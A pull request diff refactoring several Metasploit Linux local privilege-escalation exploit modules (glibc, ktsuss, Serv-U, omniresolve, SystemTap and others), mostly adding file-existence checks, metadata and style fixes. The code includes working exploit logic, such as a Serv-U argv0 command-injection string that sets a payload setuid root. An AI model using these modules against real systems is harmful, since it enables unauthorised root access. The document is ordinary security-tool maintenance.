### PR TITLE
Look before leap (check files exist before doing other things)

### DIFF
--- a/modules/exploits/linux/local/asan_suid_executable_priv_esc.rb
+++ b/modules/exploits/linux/local/asan_suid_executable_priv_esc.rb
@@ -131,10 +131,9 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def check
-    unless setuid? suid_exe_path
-      vprint_error "#{suid_exe_path} is not setuid"
-      return CheckCode::Safe
-    end
+    return CheckCode::Safe("#{suid_exe_path} file not found") unless file? suid_exe_path
+    return CheckCode::Safe("#{suid_exe_path} is not setuid") unless setuid? suid_exe_path
+
     vprint_good "#{suid_exe_path} is setuid"
 
     # Check if the executable was compiled with ASan
@@ -168,10 +167,8 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def exploit
-    if is_root?
-      unless datastore['ForceExploit']
-        fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
-      end
+    if is_root? && !datastore['ForceExploit']
+      fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
     end
 
     unless writable? base_dir

--- a/modules/exploits/linux/local/asan_suid_executable_priv_esc.rb
+++ b/modules/exploits/linux/local/asan_suid_executable_priv_esc.rb
@@ -144,7 +144,8 @@ class MetasploitModule < Msf::Exploit::Local
     # Otherwise, we can try to detect ASan via the help output with the `help=1` option.
     # This approach works regardless of whether the setuid executable is readable,
     # with the obvious disadvantage that it requires invoking the executable.
-    if cmd_exec("test -r #{suid_exe_path} && echo true").to_s.include?('true') && command_exists?('ldd')
+
+    if readable? suid_exe_path && command_exists?('ldd')
       unless cmd_exec("ldd #{suid_exe_path}").to_s.include? 'libasan.so'
         vprint_error "#{suid_exe_path} was not compiled with ASan"
         return CheckCode::Safe

--- a/modules/exploits/linux/local/glibc_ld_audit_dso_load_priv_esc.rb
+++ b/modules/exploits/linux/local/glibc_ld_audit_dso_load_priv_esc.rb
@@ -79,6 +79,11 @@ class MetasploitModule < Msf::Exploit::Local
               stdapi_fs_delete_file
             ]
           }
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK]
         }
       )
     )
@@ -100,7 +105,7 @@ class MetasploitModule < Msf::Exploit::Local
 
   def check
     glibc_banner = cmd_exec 'ldd --version'
-    glibc_version = Rex::Version.new glibc_banner.scan(/^ldd\s+\(.*\)\s+([\d\.]+)/).flatten.first
+    glibc_version = Rex::Version.new glibc_banner.scan(/^ldd\s+\(.*\)\s+([\d.]+)/).flatten.first
     if glibc_version.to_s.eql? ''
       vprint_error 'Could not determine the GNU C library version'
       return CheckCode::Safe
@@ -131,10 +136,9 @@ class MetasploitModule < Msf::Exploit::Local
     end
     vprint_good "Found #{lib} in #{@lib_dir}"
 
-    unless setuid? suid_exe_path
-      vprint_error "#{suid_exe_path} is not setuid"
-      return CheckCode::Detected
-    end
+    return CheckCode::Safe("#{suid_exe_path} file not found") unless file? suid_exe_path
+    return CheckCode::Detected("#{suid_exe_path} is not setuid") unless setuid? suid_exe_path
+
     vprint_good "#{suid_exe_path} is setuid"
 
     CheckCode::Appears
@@ -216,7 +220,7 @@ class MetasploitModule < Msf::Exploit::Local
 
     begin
       so = Metasm::ELF.compile_c(cpu, so_stub).encode_string(:lib)
-    rescue
+    rescue StandardError
       print_error "Metasm encoding failed: #{$ERROR_INFO}"
       elog "Metasm encoding failed: #{$ERROR_INFO.class} : #{$ERROR_INFO}"
       elog "Call stack:\n#{$ERROR_INFO.backtrace.join "\n"}"

--- a/modules/exploits/linux/local/glibc_origin_expansion_priv_esc.rb
+++ b/modules/exploits/linux/local/glibc_origin_expansion_priv_esc.rb
@@ -15,53 +15,52 @@ class MetasploitModule < Msf::Exploit::Local
   include Msf::Exploit::Local::Linux
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => "glibc '$ORIGIN' Expansion Privilege Escalation",
-      'Description'    => %q{
-        This module attempts to gain root privileges on Linux systems by abusing
-        a vulnerability in the GNU C Library (glibc) dynamic linker.
+    super(
+      update_info(
+        info,
+        'Name' => "glibc '$ORIGIN' Expansion Privilege Escalation",
+        'Description' => %q{
+          This module attempts to gain root privileges on Linux systems by abusing
+          a vulnerability in the GNU C Library (glibc) dynamic linker.
 
-        glibc `ld.so` versions before 2.11.3, and 2.12.x before 2.12.2 does not
-        properly restrict use of the `LD_AUDIT` environment variable when loading
-        setuid executables which allows control over the `$ORIGIN` library search
-        path resulting in execution of arbitrary shared objects.
+          glibc `ld.so` versions before 2.11.3, and 2.12.x before 2.12.2 does not
+          properly restrict use of the `LD_AUDIT` environment variable when loading
+          setuid executables which allows control over the `$ORIGIN` library search
+          path resulting in execution of arbitrary shared objects.
 
-        This module opens a file descriptor to the specified suid executable via
-        a hard link, then replaces the hard link with a shared object before
-        instructing the linker to execute the file descriptor, resulting in
-        arbitrary code execution.
+          This module opens a file descriptor to the specified suid executable via
+          a hard link, then replaces the hard link with a shared object before
+          instructing the linker to execute the file descriptor, resulting in
+          arbitrary code execution.
 
-        The specified setuid binary must be readable and located on the same
-        file system partition as the specified writable directory.
+          The specified setuid binary must be readable and located on the same
+          file system partition as the specified writable directory.
 
-        This module has been tested successfully on:
+          This module has been tested successfully on:
 
-        glibc 2.5 on CentOS 5.4 (x86_64);
-        glibc 2.5 on CentOS 5.5 (x86_64);
-        glibc 2.12 on Fedora 13 (i386); and
-        glibc 2.5-49 on RHEL 5.5 (x86_64).
+          glibc 2.5 on CentOS 5.4 (x86_64);
+          glibc 2.5 on CentOS 5.5 (x86_64);
+          glibc 2.12 on Fedora 13 (i386); and
+          glibc 2.5-49 on RHEL 5.5 (x86_64).
 
-        Some versions of `ld.so`, such as the version shipped with Ubuntu 14,
-        hit a failed assertion in `dl_open_worker` causing exploitation to fail.
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         =>
-        [
+          Some versions of `ld.so`, such as the version shipped with Ubuntu 14,
+          hit a failed assertion in `dl_open_worker` causing exploitation to fail.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
           'Tavis Ormandy', # Discovery and exploit
-          'bcoles'  # Metasploit
+          'bcoles' # Metasploit
         ],
-      'DisclosureDate' => '2010-10-18',
-      'Platform'       => 'linux',
-      'Arch'           => [ARCH_X86, ARCH_X64],
-      'SessionTypes'   => ['shell', 'meterpreter'],
-      'Targets'        =>
-        [
+        'DisclosureDate' => '2010-10-18',
+        'Platform' => 'linux',
+        'Arch' => [ARCH_X86, ARCH_X64],
+        'SessionTypes' => ['shell', 'meterpreter'],
+        'Targets' => [
           ['Automatic', {}],
           ['Linux x86', { 'Arch' => ARCH_X86 }],
           ['Linux x64', { 'Arch' => ARCH_X64 }]
         ],
-      'References'     =>
-        [
+        'References' => [
           ['CVE', '2010-3847'],
           ['BID', '44154'],
           ['EDB', '15274'],
@@ -70,7 +69,14 @@ class MetasploitModule < Msf::Exploit::Local
           ['URL', 'https://security-tracker.debian.org/tracker/CVE-2010-3847'],
           ['URL', 'https://access.redhat.com/security/cve/CVE-2010-3847']
         ],
-      'DefaultTarget'  => 0))
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK]
+        }
+      )
+    )
     register_options [
       OptString.new('SUID_EXECUTABLE', [true, 'Path to a suid executable', '/bin/ping'])
     ]
@@ -101,10 +107,9 @@ class MetasploitModule < Msf::Exploit::Local
     end
     vprint_good "GNU C Library version #{v} appears vulnerable"
 
-    unless setuid? suid_exe_path
-      vprint_error "#{suid_exe_path} is not setuid"
-      return CheckCode::Detected
-    end
+    return CheckCode::Safe("#{suid_exe_path} file not found") unless file? suid_exe_path
+    return CheckCode::Detected("#{suid_exe_path} is not setuid") unless setuid? suid_exe_path
+
     vprint_good "#{suid_exe_path} is setuid"
 
     unless cmd_exec("test -r #{suid_exe_path} && echo true").include? 'true'
@@ -202,7 +207,7 @@ class MetasploitModule < Msf::Exploit::Local
 
     begin
       so = Metasm::ELF.compile_c(cpu, so_stub).encode_string(:lib)
-    rescue => e
+    rescue StandardError => e
       print_error "Metasm encoding failed: #{$ERROR_INFO}"
       elog('Metasm encoding failed', error: e)
       fail_with Failure::Unknown, 'Metasm encoding failed'

--- a/modules/exploits/linux/local/glibc_origin_expansion_priv_esc.rb
+++ b/modules/exploits/linux/local/glibc_origin_expansion_priv_esc.rb
@@ -95,16 +95,13 @@ class MetasploitModule < Msf::Exploit::Local
 
   def check
     v = Rex::Version.new glibc_version
-    if v.eql? ''
-      vprint_error 'Could not determine the GNU C library version'
-      return CheckCode::Safe
-    end
+    return CheckCode::Safe('Could not determine the GNU C library version') if v.eql? ''
 
     if v >= Rex::Version.new('2.12.2') ||
        (v >= Rex::Version.new('2.11.3') && v < Rex::Version.new('2.12'))
-      vprint_error "GNU C Library version #{v} is not vulnerable"
-      return CheckCode::Safe
+      return CheckCode::Safe("GNU C Library version #{v} is not vulnerable")
     end
+
     vprint_good "GNU C Library version #{v} appears vulnerable"
 
     return CheckCode::Safe("#{suid_exe_path} file not found") unless file? suid_exe_path
@@ -112,10 +109,8 @@ class MetasploitModule < Msf::Exploit::Local
 
     vprint_good "#{suid_exe_path} is setuid"
 
-    unless cmd_exec("test -r #{suid_exe_path} && echo true").include? 'true'
-      vprint_error("#{suid_exe_path} is not readable")
-      return CheckCode::Detected
-    end
+    return CheckCode::Detected("#{suid_exe_path} is not readable") unless readable?(suid_exe_path)
+
     vprint_good "#{suid_exe_path} is readable"
 
     CheckCode::Appears

--- a/modules/exploits/linux/local/hp_xglance_priv_esc.rb
+++ b/modules/exploits/linux/local/hp_xglance_priv_esc.rb
@@ -53,7 +53,12 @@ class MetasploitModule < Msf::Exploit::Local
           [ 'CVE', '2014-2630' ]
         ],
         'DisclosureDate' => '2014-11-19',
-        'DefaultTarget' => 0
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK]
+        }
       )
     )
     register_options [
@@ -91,10 +96,9 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def check
-    unless setuid? glance_path
-      vprint_error "#{glance_path} not found on system"
-      return CheckCode::Safe
-    end
+    return CheckCode::Safe("#{glance_path} file not found") unless file? glance_path
+    return CheckCode::Safe("#{glance_path} is not setuid") unless setuid? glance_path
+
     lib = find_libs
     if lib.nil?
       vprint_error 'Patched xglance-bin, not linked to -L/lib64/'

--- a/modules/exploits/linux/local/ktsuss_suid_priv_esc.rb
+++ b/modules/exploits/linux/local/ktsuss_suid_priv_esc.rb
@@ -14,38 +14,37 @@ class MetasploitModule < Msf::Exploit::Local
   prepend Msf::Exploit::Remote::AutoCheck
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'ktsuss suid Privilege Escalation',
-      'Description'    => %q{
-        This module attempts to gain root privileges by exploiting
-        a vulnerability in ktsuss versions 1.4 and prior.
+    super(
+      update_info(
+        info,
+        'Name' => 'ktsuss suid Privilege Escalation',
+        'Description' => %q{
+          This module attempts to gain root privileges by exploiting
+          a vulnerability in ktsuss versions 1.4 and prior.
 
-        The ktsuss executable is setuid root and does not drop
-        privileges prior to executing user specified commands,
-        resulting in command execution with root privileges.
+          The ktsuss executable is setuid root and does not drop
+          privileges prior to executing user specified commands,
+          resulting in command execution with root privileges.
 
-        This module has been tested successfully on:
+          This module has been tested successfully on:
 
-        ktsuss 1.3 on SparkyLinux 6 (2019.08) (LXQT) (x64); and
-        ktsuss 1.3 on SparkyLinux 5.8 (LXQT) (x64).
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         =>
-        [
+          ktsuss 1.3 on SparkyLinux 6 (2019.08) (LXQT) (x64); and
+          ktsuss 1.3 on SparkyLinux 5.8 (LXQT) (x64).
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
           'John Lightsey', # Discovery and exploit
           'bcoles'         # Metasploit
         ],
-      'DisclosureDate' => '2011-08-13',
-      'References'     =>
-        [
+        'DisclosureDate' => '2011-08-13',
+        'References' => [
           ['CVE', '2011-2921'],
           ['URL', 'https://www.openwall.com/lists/oss-security/2011/08/13/2'],
           ['URL', 'https://security.gentoo.org/glsa/201201-15'],
           ['URL', 'https://github.com/bcoles/local-exploits/blob/master/CVE-2011-2921/ktsuss-lpe.sh']
         ],
-      'Platform'       => ['linux'],
-      'Arch'           =>
-        [
+        'Platform' => ['linux'],
+        'Arch' => [
           ARCH_X86,
           ARCH_X64,
           ARCH_ARMLE,
@@ -54,23 +53,23 @@ class MetasploitModule < Msf::Exploit::Local
           ARCH_MIPSLE,
           ARCH_MIPSBE
         ],
-      'SessionTypes'   => ['shell', 'meterpreter'],
-      'Targets'        => [['Auto', {}]],
-      'DefaultOptions' =>
-        {
-          'AppendExit'       => true,
+        'SessionTypes' => ['shell', 'meterpreter'],
+        'Targets' => [['Auto', {}]],
+        'DefaultOptions' => {
+          'AppendExit' => true,
           'PrependSetresuid' => true,
           'PrependSetresgid' => true,
-          'PrependSetreuid'  => true,
-          'PrependSetuid'    => true,
-          'PrependFork'      => true
+          'PrependSetreuid' => true,
+          'PrependSetuid' => true,
+          'PrependFork' => true
         },
-      'Notes'          =>
-        {
+        'Notes' => {
           'Reliability' => [ REPEATABLE_SESSION ],
-          'Stability'   => [ CRASH_SAFE ]
+          'Stability' => [ CRASH_SAFE ]
         },
-      'DefaultTarget'  => 0))
+        'DefaultTarget' => 0
+      )
+    )
     register_options [
       OptString.new('KTSUSS_PATH', [true, 'Path to staprun executable', '/usr/bin/ktsuss'])
     ]
@@ -100,10 +99,9 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def check
-    unless setuid? ktsuss_path
-      vprint_error "#{ktsuss_path} is not setuid"
-      return CheckCode::Safe
-    end
+    return CheckCode::Safe("#{ktsuss_path} file not found") unless file? ktsuss_path
+    return CheckCode::Safe("#{ktsuss_path} is not setuid") unless setuid? ktsuss_path
+
     vprint_good "#{ktsuss_path} is setuid"
 
     id = cmd_exec 'whoami'
@@ -118,10 +116,8 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def exploit
-    if is_root?
-      unless datastore['ForceExploit']
-        fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
-      end
+    if is_root? && !datastore['ForceExploit']
+      fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
     end
 
     unless writable? base_dir

--- a/modules/exploits/linux/local/libuser_roothelper_priv_esc.rb
+++ b/modules/exploits/linux/local/libuser_roothelper_priv_esc.rb
@@ -69,20 +69,23 @@ class MetasploitModule < Msf::Exploit::Local
           [ 'URL', 'https://access.redhat.com/articles/1537873' ]
         ],
         'DefaultTarget' => 0,
-        'Notes' => {
-          'AKA' => ['roothelper.c']
-        },
         'Compat' => {
           'Meterpreter' => {
             'Commands' => %w[
               stdapi_sys_process_execute
             ]
           }
+        },
+        'Notes' => {
+          'AKA' => ['roothelper.c'],
+          'Stability' => [SERVICE_RESOURCE_LOSS],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK]
         }
       )
     )
     register_options [
-      OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w(Auto True False) ]),
+      OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w[Auto True False] ]),
       OptString.new('PASSWORD', [ true, 'Password for the current user', '' ])
     ]
     register_advanced_options [
@@ -129,14 +132,13 @@ class MetasploitModule < Msf::Exploit::Local
 
   def check
     userhelper_path = '/usr/sbin/userhelper'
-    unless setuid? userhelper_path
-      vprint_error "#{userhelper_path} is not setuid"
-      return CheckCode::Safe
-    end
+    return CheckCode::Safe("#{userhelper_path} file not found") unless file? userhelper_path
+    return CheckCode::Safe("#{userhelper_path} is not setuid") unless setuid? userhelper_path
+
     vprint_good "#{userhelper_path} is setuid"
 
     unless command_exists? 'script'
-      vprint_error "script is not installed. Exploitation will fail."
+      vprint_error 'script is not installed. Exploitation will fail.'
       return CheckCode::Safe
     end
     vprint_good 'script is installed'
@@ -148,7 +150,7 @@ class MetasploitModule < Msf::Exploit::Local
     vprint_good 'File /etc/passwd is not immutable'
 
     glibc_banner = cmd_exec 'ldd --version'
-    glibc_version = Rex::Version.new glibc_banner.scan(/^ldd\s+\(.*\)\s+([\d\.]+)/).flatten.first
+    glibc_version = Rex::Version.new glibc_banner.scan(/^ldd\s+\(.*\)\s+([\d.]+)/).flatten.first
     if glibc_version.to_s.eql? ''
       vprint_error 'Could not determine the GNU C library version'
       return CheckCode::Detected
@@ -165,10 +167,8 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def exploit
-    if is_root?
-      unless datastore['ForceExploit']
-        fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
-      end
+    if is_root? && !datastore['ForceExploit']
+      fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
     end
 
     unless writable? base_dir
@@ -216,7 +216,7 @@ class MetasploitModule < Msf::Exploit::Local
     output.each_line { |line| vprint_status line.chomp }
 
     if output =~ %r{Creating a backup copy of "/etc/passwd" named "(.*)"}
-      register_file_for_cleanup $1
+      register_file_for_cleanup ::Regexp.last_match(1)
     end
 
     if output =~ /died in parent: .*.c:517: forkstop_userhelper/
@@ -226,7 +226,7 @@ class MetasploitModule < Msf::Exploit::Local
     @username = nil
 
     if output =~ /Exploit successful, run "su ([a-z])" to become root/
-      @username = $1
+      @username = ::Regexp.last_match(1)
     end
 
     if @username.blank?
@@ -279,7 +279,7 @@ class MetasploitModule < Msf::Exploit::Local
     unless new_user_removed
       print_warning "Could not remove user '#{@username}' from /etc/passwd"
     end
-  rescue => e
+  rescue StandardError => e
     print_error "Error during cleanup: #{e.message}"
   ensure
     super

--- a/modules/exploits/linux/local/nested_namespace_idmap_limit_priv_esc.rb
+++ b/modules/exploits/linux/local/nested_namespace_idmap_limit_priv_esc.rb
@@ -124,7 +124,7 @@ class MetasploitModule < Msf::Exploit::Local
     end
 
     register_file_for_cleanup path
-    chmod path, 0o755
+    chmod path, 0755
   end
 
   def strip_comments(c_code)

--- a/modules/exploits/linux/local/nested_namespace_idmap_limit_priv_esc.rb
+++ b/modules/exploits/linux/local/nested_namespace_idmap_limit_priv_esc.rb
@@ -124,7 +124,7 @@ class MetasploitModule < Msf::Exploit::Local
     end
 
     register_file_for_cleanup path
-    chmod path, 0755
+    chmod path, 0o755
   end
 
   def strip_comments(c_code)
@@ -150,10 +150,9 @@ class MetasploitModule < Msf::Exploit::Local
 
   def check
     ['/usr/bin/newuidmap', '/usr/bin/newgidmap'].each do |path|
-      unless setuid? path
-        vprint_error "#{path} is not set-uid"
-        return CheckCode::Safe
-      end
+      return CheckCode::Safe("#{path} file not found") unless file? path
+      return CheckCode::Safe("#{path} is not setuid") unless setuid? path
+
       vprint_good "#{path} is set-uid"
     end
 
@@ -201,10 +200,8 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def exploit
-    if is_root?
-      unless datastore['ForceExploit']
-        fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
-      end
+    if is_root? && !datastore['ForceExploit']
+      fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
     end
 
     unless writable? base_dir

--- a/modules/exploits/linux/local/omniresolve_suid_priv_esc.rb
+++ b/modules/exploits/linux/local/omniresolve_suid_priv_esc.rb
@@ -14,67 +14,68 @@ class MetasploitModule < Msf::Exploit::Local
   prepend Msf::Exploit::Remote::AutoCheck
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Micro Focus (HPE) Data Protector SUID Privilege Escalation',
-      'Description'    => %q{
-        This module exploits the trusted `$PATH` environment
-        variable of the SUID binary `omniresolve` in
-        Micro Focus (HPE) Data Protector A.10.40 and prior.
+    super(
+      update_info(
+        info,
+        'Name' => 'Micro Focus (HPE) Data Protector SUID Privilege Escalation',
+        'Description' => %q{
+          This module exploits the trusted `$PATH` environment
+          variable of the SUID binary `omniresolve` in
+          Micro Focus (HPE) Data Protector A.10.40 and prior.
 
-        The `omniresolve` executable calls the `oracleasm` binary using
-        a relative path and the trusted environment `$PATH`, which allows
-        an attacker to execute a custom binary with `root` privileges.
+          The `omniresolve` executable calls the `oracleasm` binary using
+          a relative path and the trusted environment `$PATH`, which allows
+          an attacker to execute a custom binary with `root` privileges.
 
-        This module has been successfully tested on:
-        HPE Data Protector A.09.07: OMNIRESOLVE, internal build 110, built on Thu Aug 11 14:52:38 2016;
-        Micro Focus Data Protector A.10.40: OMNIRESOLVE, internal build 118, built on Tue May 21 05:49:04 2019 on CentOS Linux release 7.6.1810 (Core)
+          This module has been successfully tested on:
+          HPE Data Protector A.09.07: OMNIRESOLVE, internal build 110, built on Thu Aug 11 14:52:38 2016;
+          Micro Focus Data Protector A.10.40: OMNIRESOLVE, internal build 118, built on Tue May 21 05:49:04 2019 on CentOS Linux release 7.6.1810 (Core)
 
-        The vulnerability has been patched in:
-        Micro Focus Data Protector A.10.40: OMNIRESOLVE, internal build 125, built on Mon Aug 19 19:22:20 2019
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         =>
-        [
+          The vulnerability has been patched in:
+          Micro Focus Data Protector A.10.40: OMNIRESOLVE, internal build 125, built on Mon Aug 19 19:22:20 2019
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
           's7u55', # Discovery and Metasploit module
         ],
-      'DisclosureDate' => '2019-09-13',
-      'Platform'       => [ 'linux' ],
-      'Arch'           => [ ARCH_X86, ARCH_X64 ],
-      'SessionTypes'   => [ 'shell', 'meterpreter' ],
-      'Targets'        =>
-        [
+        'DisclosureDate' => '2019-09-13',
+        'Platform' => [ 'linux' ],
+        'Arch' => [ ARCH_X86, ARCH_X64 ],
+        'SessionTypes' => [ 'shell', 'meterpreter' ],
+        'Targets' => [
           [
             'Micro Focus (HPE) Data Protector <= 10.40 build 118',
-            upper_version: Rex::Version.new('10.40')
+            { upper_version: Rex::Version.new('10.40') }
           ]
         ],
-      'DefaultOptions' =>
-        {
+        'DefaultOptions' => {
           'PrependSetgid' => true,
           'PrependSetuid' => true
         },
-      'References'     =>
-        [
+        'References' => [
           [ 'CVE', '2019-11660' ],
           [ 'URL', 'https://softwaresupport.softwaregrp.com/doc/KM03525630' ]
         ],
-      'Notes'          =>
-        {
+        'Notes' => {
           'Reliability' => [ REPEATABLE_SESSION ],
-          'Stability'   => [ CRASH_SAFE ]
+          'Stability' => [ CRASH_SAFE ],
+          'SideEffects' => [ARTIFACTS_ON_DISK]
         },
-      'DefaultTarget'  => 0
-    ))
+        'DefaultTarget' => 0
+      )
+    )
 
     register_options(
       [
         OptString.new('SUID_PATH', [ true, 'Path to suid executable omniresolve', '/opt/omni/lbin/omniresolve' ])
-      ])
+      ]
+    )
 
     register_advanced_options(
       [
         OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
-      ])
+      ]
+    )
   end
 
   def base_dir
@@ -86,15 +87,13 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def check
-    unless setuid? suid_bin_path
-      vprint_error("#{suid_bin_path} executable is not setuid")
-      return CheckCode::Safe
-    end
+    return CheckCode::Safe("#{suid_bin_path} file not found") unless file? suid_bin_path
+    return CheckCode::Safe("#{suid_bin_path} is not setuid") unless setuid? suid_bin_path
 
     info = cmd_exec("#{suid_bin_path} -ver").to_s
     if info =~ /(?<=\w\.)(\d\d\.\d\d)(.*)(?<=build )(\d\d\d)/
-      version = '%.2f' % $1.to_f
-      build = $3.to_i
+      version = '%.2f' % ::Regexp.last_match(1).to_f
+      build = ::Regexp.last_match(3).to_i
       vprint_status("omniresolve version #{version} build #{build}")
 
       unless Rex::Version.new(version) < target[:upper_version] ||
@@ -105,15 +104,13 @@ class MetasploitModule < Msf::Exploit::Local
       return CheckCode::Appears
     end
 
-    vprint_error("Could not parse omniresolve -ver output")
+    vprint_error('Could not parse omniresolve -ver output')
     CheckCode::Detected
   end
 
   def exploit
-    if is_root?
-      unless datastore['ForceExploit']
-        fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.')
-      end
+    if is_root? && !datastore['ForceExploit']
+      fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.')
     end
 
     unless writable?(base_dir)

--- a/modules/exploits/linux/local/polkit_dbus_auth_bypass.rb
+++ b/modules/exploits/linux/local/polkit_dbus_auth_bypass.rb
@@ -102,10 +102,6 @@ class MetasploitModule < Msf::Exploit::Local
                .gsub(/\s+/, ' ')) =~ /success/
   end
 
-  def executable?(path)
-    cmd_exec("test -x '#{path}' && echo true").include? 'true'
-  end
-
   def get_cmd_delay
     user = rand_text_alphanumeric(8)
     time_command = "bash -c 'time dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:#{user} string:\"#{user}\" int32:1'"

--- a/modules/exploits/linux/local/servu_ftp_server_prepareinstallation_priv_esc.rb
+++ b/modules/exploits/linux/local/servu_ftp_server_prepareinstallation_priv_esc.rb
@@ -114,7 +114,7 @@ class MetasploitModule < Msf::Exploit::Local
 
     return CheckCode::Safe("#{servu_path} file not found") unless file? servu_path
 
-    return CheckCode::Safe("#{servu_path} is not executable") unless cmd_exec("test -x '#{servu_path}' && echo true").include? 'true'
+    return CheckCode::Safe("#{servu_path} is not executable") unless executable?(servu_path)
 
     vprint_good "#{servu_path} is executable"
 

--- a/modules/exploits/linux/local/servu_ftp_server_prepareinstallation_priv_esc.rb
+++ b/modules/exploits/linux/local/servu_ftp_server_prepareinstallation_priv_esc.rb
@@ -108,32 +108,26 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def check
-    unless command_exists? 'bash'
-      vprint_error 'bash shell is not available'
-      return CheckCode::Safe
-    end
+    return CheckCode::Safe('bash shell is not available') unless command_exists? 'bash'
+
     vprint_good 'bash shell is available'
 
-    unless cmd_exec("test -x '#{servu_path}' && echo true").include? 'true'
-      vprint_error "#{servu_path} is not executable"
-      return CheckCode::Safe
-    end
+    return CheckCode::Safe("#{servu_path} file not found") unless file? servu_path
+
+    return CheckCode::Safe("#{servu_path} is not executable") unless cmd_exec("test -x '#{servu_path}' && echo true").include? 'true'
+
     vprint_good "#{servu_path} is executable"
 
-    unless setuid? servu_path
-      vprint_error "#{servu_path} is not setuid"
-      return CheckCode::Safe
-    end
+    return CheckCode::Safe("#{servu_path} is not setuid") unless setuid? servu_path
+
     vprint_good "#{servu_path} is setuid"
 
     CheckCode::Detected
   end
 
   def exploit
-    if is_root?
-      unless datastore['ForceExploit']
-        fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
-      end
+    if is_root? && !datastore['ForceExploit']
+      fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
     end
 
     unless writable? base_dir
@@ -148,8 +142,8 @@ class MetasploitModule < Msf::Exploit::Local
     @payload_path = "#{base_dir}/#{payload_name}"
     upload_and_chmodx @payload_path, generate_payload_exe
 
-    argv0 = %Q{\\";chown root #{@payload_path};chmod u+s #{@payload_path};chmod +x #{@payload_path}\\"}
-    cmd = %Q{bash -c 'exec -a "#{argv0}" #{servu_path} -prepareinstallation'}
+    argv0 = %(\\";chown root #{@payload_path};chmod u+s #{@payload_path};chmod +x #{@payload_path}\\")
+    cmd = %(bash -c 'exec -a "#{argv0}" #{servu_path} -prepareinstallation')
     vprint_status "Executing command: #{cmd}"
     cmd_exec cmd
 

--- a/modules/exploits/linux/local/systemtap_modprobe_options_priv_esc.rb
+++ b/modules/exploits/linux/local/systemtap_modprobe_options_priv_esc.rb
@@ -14,32 +14,32 @@ class MetasploitModule < Msf::Exploit::Local
   prepend Msf::Exploit::Remote::AutoCheck
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'SystemTap MODPROBE_OPTIONS Privilege Escalation',
-      'Description'    => %q{
-        This module attempts to gain root privileges by exploiting a
-        vulnerability in the `staprun` executable included with SystemTap
-        version 1.3.
+    super(
+      update_info(
+        info,
+        'Name' => 'SystemTap MODPROBE_OPTIONS Privilege Escalation',
+        'Description' => %q{
+          This module attempts to gain root privileges by exploiting a
+          vulnerability in the `staprun` executable included with SystemTap
+          version 1.3.
 
-        The `staprun` executable does not clear environment variables prior to
-        executing `modprobe`, allowing an arbitrary configuration file to be
-        specified in the `MODPROBE_OPTIONS` environment variable, resulting
-        in arbitrary command execution with root privileges.
+          The `staprun` executable does not clear environment variables prior to
+          executing `modprobe`, allowing an arbitrary configuration file to be
+          specified in the `MODPROBE_OPTIONS` environment variable, resulting
+          in arbitrary command execution with root privileges.
 
-        This module has been tested successfully on:
+          This module has been tested successfully on:
 
-        systemtap 1.2-1.fc13-i686 on Fedora 13 (i686); and
-        systemtap 1.1-3.el5 on RHEL 5.5 (x64).
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         =>
-        [
+          systemtap 1.2-1.fc13-i686 on Fedora 13 (i686); and
+          systemtap 1.1-3.el5 on RHEL 5.5 (x64).
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
           'Tavis Ormandy', # Discovery and exploit
-          'bcoles'         # Metasploit
+          'bcoles' # Metasploit
         ],
-      'DisclosureDate' => '2010-11-17',
-      'References'     =>
-        [
+        'DisclosureDate' => '2010-11-17',
+        'References' => [
           ['BID', '44914'],
           ['CVE', '2010-4170'],
           ['EDB', '15620'],
@@ -50,9 +50,8 @@ class MetasploitModule < Msf::Exploit::Local
           ['URL', 'https://bugs.launchpad.net/bugs/677226'],
           ['URL', 'https://www.debian.org/security/2011/dsa-2348']
         ],
-      'Platform'       => ['linux'],
-      'Arch'           =>
-        [
